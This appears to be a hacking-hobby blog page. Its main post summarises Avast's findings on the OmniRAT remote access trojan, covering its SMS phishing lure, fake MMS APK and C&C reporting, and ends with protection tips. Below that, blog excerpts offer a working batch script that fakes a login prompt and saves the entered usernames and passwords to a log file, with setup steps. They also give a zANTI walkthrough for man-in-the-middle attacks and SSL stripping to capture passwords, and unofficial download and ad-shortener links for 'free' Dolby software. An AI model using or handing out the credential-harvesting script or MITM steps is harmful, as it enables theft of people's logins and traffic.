Skip to main content

Omnirat save us

OmniRAT :– $25 tool to hack into Windows, OS X and Android device

$25 OmniRAT is a “Remote Administration Tool” which can hack into Windows, OS X and Android run devices

OmniRAT is a software that lets you hack into computers running on Windows and Mac OS X in addition to hacking Android smartphones and tablets. OmniRAT can can spy on communications, secretly record conversations, snoop on browsing histories and take complete control of a remote device. And its cheap. OmniRAT is available on the dark web underground forums for $25 compared to another notorious malware, DroidJack which is sold for $210.

Security researcher Nikolaos Chrysaidos from anti-virus maker Avast who discovered the OmniRAT and calls it a Remote Administration tool .  In his blog post Chrysaidos describes how he believes hackers have infected Androids with OmniRAT after sending an SMS. Chrysaidos says that OmniRAT can also be used for legitimate purposes, with the permission and consent of the owners of Android, Mac and Windows computers it tries to control. But in the hands of a cyber criminal it becomes a “Remote Access Trojan” – giving the malicious hackers an opportunity to sneakily spy on and steal from unsuspecting users duped into installing the code.

The OmniRAT spreads through phishing which takes the victim to a website laden with the installation file of OmniRAT. A German Android user explained on the Techboard forum on how he was lured into a website with OmniRAT.  He said that had received an SMS telling him that an MMS had not been delivered directly to him due to the StageFright vulnerability. In order to access the MMS, he was told to follow a bit.ly link within three days, and enter a PIN code.

However, as Crysaidos explains, visiting the URL would initiate the attempt to install OmniRAT onto the target’s Android device:

Once you enter your number and code, an APK, mms-einst8923, is downloaded onto the Android device. The mms-einst8923.apk, once installed, loads a message onto the phone saying that the MMS settings have been successfully modified and loads an icon, labeled “MMS Retrieve” onto the phone.

Once the icon is opened by the victim, mms-einst8923.apk extracts OmniRat, which is encoded within the mms-einst8923.apk. In the example described on Techboard-online, a customized version of OmniRat is extracted.

The APK than demands the Android user to accept a long list of permissions which should trigger suspicions among tech savvy users.

Once installed, the App will send its own SMS message to the victims friends and colleagues listed in the contact list and further spread itself. The OmniRAT cannot be uninstalled once it is installed on the Android smartphones.  Chrysaidos says that even if the victim uninstalls the MMS Retrieve icon, the customised version of OmniRAT remains installed on his/her Android smartphone, and will be sending data to a command and control (C&C) server seemingly based in Russia.

Chrysaidos says that Android users should undertake following steps to protect themselves from OmniRAT.

Make sure you have an antivirus solution installed on your smartphone to detect malware, like OmniRat. Avast detects OmniRat as Android:OmniRat-A [Trj].Do not open any links from untrusted sources. If an unknown number or email address sends you a link, do not open the link.Do not download apps from unknown sources to your mobile device. Only download apps from trusted sources such as the Google Play Store or the Apple App Store

Comments

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file will be in there, [if you make a second entry, the

get dolby atmos free on your PC

Welcome to my blog today i am here with very important item for your DDOOLLBBYY Atmos Everyone  or (at least geeks) knows  about the power of Dolby atmos we used to know that dolby atmos was only available for select PC only well not anymore from this link you can get in any pc note:  after installing dolby atmos install dolby access from https://dw27.malavida.com/dwn/8bdf73315506600b39e53dedb7616c896cc3811b629894bbe0bc994820b8af75/DolbyAccess.appx    and son't update from window store ..    just don't update it links http://gestyy.com/w2mDPI for dolby atmos   http://gestyy.com/w2mDKi  for device  driver ' http://gestyy.com/w2mDCF   for dolby atmos for gaming http://gestyy.com/w2mDN7    for dolby gaming driver if you  have any question feel free to comment

use zantu on android

Zanti 2 is a android application which is made up for network penetration testing. What Zanti 2 can do? Scan the whole network show alive host in the network scan port through Nmap for port Scanning Scan Service on each port and find vulnerability. Perform Brute force Attack Perform Shell Shock etc Vulnerability MITM : Man In The Middle Attack Session Hijackings SSL Striping Sniffing Packets Replace Image Redirect URL and IP Intercept and modified live download. Disclaimer –  I recommend that you test this tutorial on a system that belongs to YOU.   For Demonstration : Before  install Zanti your Phone must be rooted  .. In case your phone is not rooted search in the site you will find how to root android its very easy. I used Zanti in my android device and Scan the network. I choose the Mac OSx Machine which was my laptop. After that start The MITM on and SSL strip to grab some packets and try to grab the password of that machine. in the end i successfully travel the